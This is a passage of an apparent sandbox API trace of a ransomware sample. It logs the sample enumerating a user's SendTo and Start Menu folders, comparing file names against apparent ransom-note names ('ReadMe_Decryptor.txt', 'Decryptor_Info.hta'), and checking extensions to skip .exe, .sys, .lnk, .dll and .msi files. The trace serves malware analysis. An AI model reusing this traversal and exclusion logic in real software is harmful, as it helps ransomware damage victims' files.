lpString2="Decryptor_Info.hta") returned 1 [0084.781] PathFindExtensionW (pszPath="TtegBM.lnk") returned=".lnk" [0084.781] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.781] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.781] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.781] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4034660, ftCreationTime.dwHighDateTime=0x1d5e82a, ftLastAccessTime.dwLowDateTime=0xe4034660, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe4034660, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x1a31, dwReserved0=0x0, dwReserved1=0x0, cFileName="ttIR1y8rGjuXrKO.lnk", cAlternateFileName="TTIR1Y~1.LNK")) returned 1 [0084.781] lstrcmpW (lpString1="ttIR1y8rGjuXrKO.lnk", lpString2=".") returned 1 [0084.781] lstrcmpW (lpString1="ttIR1y8rGjuXrKO.lnk", lpString2="..") returned 1 [0084.781] lstrcmpiW (lpString1="ttIR1y8rGjuXrKO.lnk", lpString2="ReadMe_Decryptor.txt") returned 1 [0084.781] lstrcmpiW (lpString1="ttIR1y8rGjuXrKO.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.782] PathFindExtensionW (pszPath="ttIR1y8rGjuXrKO.lnk") returned=".lnk" [0084.782] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.782] PathFindExtensionW (pszPath="tykbhefC09YpuJ6GZ.lnk") returned=".lnk" [0084.782] PathFindExtensionW (pszPath="UDo RtsFOqtIKqpZl.lnk") returned=".lnk" [0084.782] PathFindExtensionW (pszPath="UYmmRCVOWVM3.lnk") returned=".lnk" [0084.782] PathFindExtensionW (pszPath="v11WPZ.lnk") returned=".lnk" [0084.782] PathFindExtensionW (pszPath="V6yD8H.lnk") returned=".lnk" [0084.782] PathFindExtensionW (pszPath="w7Dlby_SMcv7Lq87Z3YF.flv.lnk") returned=".lnk" [0084.782] PathFindExtensionW (pszPath="Wa1hFpnI1kWMpXl70R.lnk") returned=".lnk" [0084.782] PathFindExtensionW (pszPath="wB8JKel.lnk") returned=".lnk" [0084.782] PathFindExtensionW (pszPath="WgsaRbbd.lnk") returned=".lnk" [0084.783] PathFindExtensionW (pszPath="WIvbClqSIjfcdCzevi.lnk") returned=".lnk" [0084.783] PathFindExtensionW (pszPath="wP8TBOjWTS.lnk") returned=".lnk" [0084.783] PathFindExtensionW (pszPath="wRC5 JP.lnk") returned=".lnk" [0084.783] PathFindExtensionW (pszPath="wYI0n24YE.lnk") returned=".lnk" [0084.783] PathFindExtensionW (pszPath="Wzj4_bQk.mkv.lnk") returned=".lnk" [0084.783] PathFindExtensionW (pszPath="WZnm.lnk") returned=".lnk" [0084.783] PathFindExtensionW (pszPath="x zmR5y1qj512CT.mkv.lnk") returned=".lnk" [0084.783] PathFindExtensionW (pszPath="X2JajLRX6.lnk") returned=".lnk" [0084.783] PathFindExtensionW (pszPath="X8dzWrXMsQ50rnRg8ep8.lnk") returned=".lnk" [0084.783] PathFindExtensionW (pszPath="XDsNA6J.lnk") returned=".lnk" [0084.783] PathFindExtensionW (pszPath="xfIlkCQ8.lnk") returned=".lnk" [0084.784] PathFindExtensionW (pszPath="XHwlj9j VbWdeS7-SZYl.lnk") returned=".lnk" [0084.784] PathFindExtensionW (pszPath="xmjH-0kbV4fPwbOWT--.lnk") returned=".lnk" [0084.784] PathFindExtensionW (pszPath="Xz4CLFfk7P2.mkv.lnk") returned=".lnk" [0084.784] PathFindExtensionW (pszPath="y5rr_tZTBD06B8p.lnk") returned=".lnk" [0084.784] PathFindExtensionW (pszPath="y6vMsTOoHqcD2QNiP.mkv.lnk") returned=".lnk" [0084.784] PathFindExtensionW (pszPath="ymOAZf.lnk") returned=".lnk" [0084.784] PathFindExtensionW (pszPath="YXKYisSII 8q.lnk") returned=".lnk" [0084.784] PathFindExtensionW (pszPath="Z-Vb.lnk") returned=".lnk" [0084.784] PathFindExtensionW (pszPath="zIJ9l4vUg8q7Ye0AeiB.lnk") returned=".lnk" [0084.784] PathFindExtensionW (pszPath="ZiuxzLiZD3pWCkdkuqv.mkv.lnk") returned=".lnk" [0084.784] PathFindExtensionW (pszPath="zMuEM6hwu.lnk") returned=".lnk" [0084.785] PathFindExtensionW (pszPath="ZNdVz.lnk") returned=".lnk" [0084.785] PathFindExtensionW (pszPath="zZ8e8YCcVmCA6xZao.lnk") returned=".lnk" [0084.785] PathFindExtensionW (pszPath="_3Q0x_8s.lnk") returned=".lnk" [0084.786] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0084.903] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.903] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf9b7c855, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.904] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.904] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.904] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x639ff80f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Compressed (zipped) Folder.ZFSendToTarget", cAlternateFileName="COMPRE~1.ZFS")) returned 1 [0084.904] lstrcmpW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2=".") returned 1 [0084.904] lstrcmpW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="..") returned 1 [0084.904] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.904] lstrcmpiW (lpString1="Compressed (zipped) Folder.ZFSendToTarget", lpString2="Decryptor_Info.hta") returned -1 [0084.904] PathFindExtensionW (pszPath="Compressed (zipped) Folder.ZFSendToTarget") returned=".ZFSendToTarget" [0084.904] PathFindExtensionW (pszPath="Desktop (create shortcut).DeskLink") returned=".DeskLink" [0084.904] PathFindExtensionW (pszPath="Desktop.ini") returned=".ini" [0084.904] PathFindExtensionW (pszPath="Documents.mydocs") returned=".mydocs" [0084.904] PathFindExtensionW (pszPath="Fax Recipient.lnk") returned=".lnk" [0084.905] PathFindExtensionW (pszPath="Mail Recipient.MAPIMail") returned=".MAPIMail" [0084.906] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0084.906] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.906] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.907] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.907] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.907] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0084.907] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0084.907] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0084.907] lstrcmpiW (lpString1="desktop.ini", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.907] lstrcmpiW (lpString1="desktop.ini", lpString2="Decryptor_Info.hta") returned 1 [0084.907] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0084.907] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x781f78 [0084.907] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.907] FindNextFileW (in: hFindFile=0x781f78, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d7ae880, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.907] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.908] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.908] FindNextFileW (in: hFindFile=0x781f78, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d76088a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~1")) returned 1 [0084.908] lstrcmpW (lpString1="Accessories", lpString2=".") returned 1 [0084.908] lstrcmpW (lpString1="Accessories", lpString2="..") returned 1 [0084.908] lstrlenW (lpString="Accessories") returned 11 [0084.908] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Accessories" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories" [0084.908] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\" [0084.908] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\") returned 96 [0084.908] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x7810d0 [0084.935] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.935] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d76088a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.936] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.937] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.937] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1b75a077, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessibility", cAlternateFileName="ACCESS~1")) returned 1 [0084.937] lstrcmpW (lpString1="Accessibility", lpString2=".") returned 1 [0084.937] lstrcmpW (lpString1="Accessibility", lpString2="..") returned 1 [0084.937] lstrlenW (lpString="Accessibility") returned 13 [0084.937] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\", lpString2="Accessibility" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility" [0084.937] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\" [0084.937] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\") returned 110 [0084.937] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Accessibility\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x781110 [0084.937] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.937] FindNextFileW (in: hFindFile=0x781110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1b75a077, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.939] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.939] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.939] FindNextFileW (in: hFindFile=0x781110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1b75a077, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0084.939] lstrcmpW (lpString1="Desktop.ini", lpString2=".") returned 1 [0084.939] lstrcmpW (lpString1="Desktop.ini", lpString2="..") returned 1 [0084.940] lstrcmpiW (lpString1="Desktop.ini", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.940] lstrcmpiW (lpString1="Desktop.ini", lpString2="Decryptor_Info.hta") returned 1 [0084.940] PathFindExtensionW (pszPath="Desktop.ini") returned=".ini" [0084.940] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0084.940] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0084.940] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0084.940] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0084.941] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0084.941] FindNextFileW (in: hFindFile=0x781110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1ab4d101, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x54e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ease of Access.lnk", cAlternateFileName="EASEOF~1.LNK")) returned 1 [0084.941] lstrcmpW (lpString1="Ease of Access.lnk", lpString2=".") returned 1 [0084.941] lstrcmpW (lpString1="Ease of Access.lnk", lpString2="..") returned 1 [0084.941] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.941] lstrcmpiW (lpString1="Ease of Access.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.941] PathFindExtensionW (pszPath="Ease of Access.lnk") returned=".lnk" [0084.941] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.941] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.941] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.941] FindNextFileW (in: hFindFile=0x781110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1a98407e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Magnify.lnk", cAlternateFileName="")) returned 1 [0084.941] lstrcmpW (lpString1="Magnify.lnk", lpString2=".") returned 1 [0084.941] lstrcmpW (lpString1="Magnify.lnk", lpString2="..") returned 1 [0084.941] lstrcmpiW (lpString1="Magnify.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.941] lstrcmpiW (lpString1="Magnify.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.941] PathFindExtensionW (pszPath="Magnify.lnk") returned=".lnk" [0084.941] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.941] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.941] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.941] FindNextFileW (in: hFindFile=0x781110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1b733f17, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="Narrator.lnk", cAlternateFileName="")) returned 1 [0084.941] lstrcmpW (lpString1="Narrator.lnk", lpString2=".") returned 1 [0084.942] lstrcmpW (lpString1="Narrator.lnk", lpString2="..") returned 1 [0084.942] lstrcmpiW (lpString1="Narrator.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.942] lstrcmpiW (lpString1="Narrator.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.942] PathFindExtensionW (pszPath="Narrator.lnk") returned=".lnk" [0084.942] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.942] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.942] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.942] FindNextFileW (in: hFindFile=0x781110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1aa4275f, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="On-Screen Keyboard.lnk", cAlternateFileName="ON-SCR~1.LNK")) returned 1 [0084.942] lstrcmpW (lpString1="On-Screen Keyboard.lnk", lpString2=".") returned 1 [0084.942] lstrcmpW (lpString1="On-Screen Keyboard.lnk", lpString2="..") returned 1 [0084.942] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.942] lstrcmpiW (lpString1="On-Screen Keyboard.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.942] PathFindExtensionW (pszPath="On-Screen Keyboard.lnk") returned=".lnk" [0084.942] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.942] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.942] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.942] FindNextFileW (in: hFindFile=0x781110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1aa4275f, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="On-Screen Keyboard.lnk", cAlternateFileName="ON-SCR~1.LNK")) returned 0 [0084.942] FindClose (in: hFindFile=0x781110 | out: hFindFile=0x781110) returned 1 [0084.943] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2a53d8cd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x500, dwReserved0=0x0, dwReserved1=0x0, cFileName="Command Prompt.lnk", cAlternateFileName="COMMAN~1.LNK")) returned 1 [0084.943] lstrcmpW (lpString1="Command Prompt.lnk", lpString2=".") returned 1 [0084.943] lstrcmpW (lpString1="Command Prompt.lnk", lpString2="..") returned 1 [0084.943] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.943] lstrcmpiW (lpString1="Command Prompt.lnk", lpString2="Decryptor_Info.hta") returned -1 [0084.943] PathFindExtensionW (pszPath="Command Prompt.lnk") returned=".lnk" [0084.943] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.943] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.943] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.943] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d76088a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x2a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0084.943] lstrcmpW (lpString1="Desktop.ini", lpString2=".") returned 1 [0084.943] lstrcmpW (lpString1="Desktop.ini", lpString2="..") returned 1 [0084.943] lstrcmpiW (lpString1="Desktop.ini", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.943] lstrcmpiW (lpString1="Desktop.ini", lpString2="Decryptor_Info.hta") returned 1 [0084.943] PathFindExtensionW (pszPath="Desktop.ini") returned=".ini" [0084.943] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0084.943] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0084.943] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0084.944] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0084.944] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0084.944] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d73a72a, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x518, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notepad.lnk", cAlternateFileName="")) returned 1 [0084.944] lstrcmpW (lpString1="Notepad.lnk", lpString2=".") returned 1 [0084.944] lstrcmpW (lpString1="Notepad.lnk", lpString2="..") returned 1 [0084.944] lstrcmpiW (lpString1="Notepad.lnk", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.944] lstrcmpiW (lpString1="Notepad.lnk", lpString2="Decryptor_Info.hta") returned 1 [0084.944] PathFindExtensionW (pszPath="Notepad.lnk") returned=".lnk" [0084.944] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0084.944] lstrcmpiW (lpString1=".lnk", lpString2=".sys") returned -1 [0084.944] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0084.944] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfec52d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Run.lnk", cAlternateFileName="")) returned 1 [0084.944] lstrcmpW (lpString1="Run.lnk", lpString2=".") 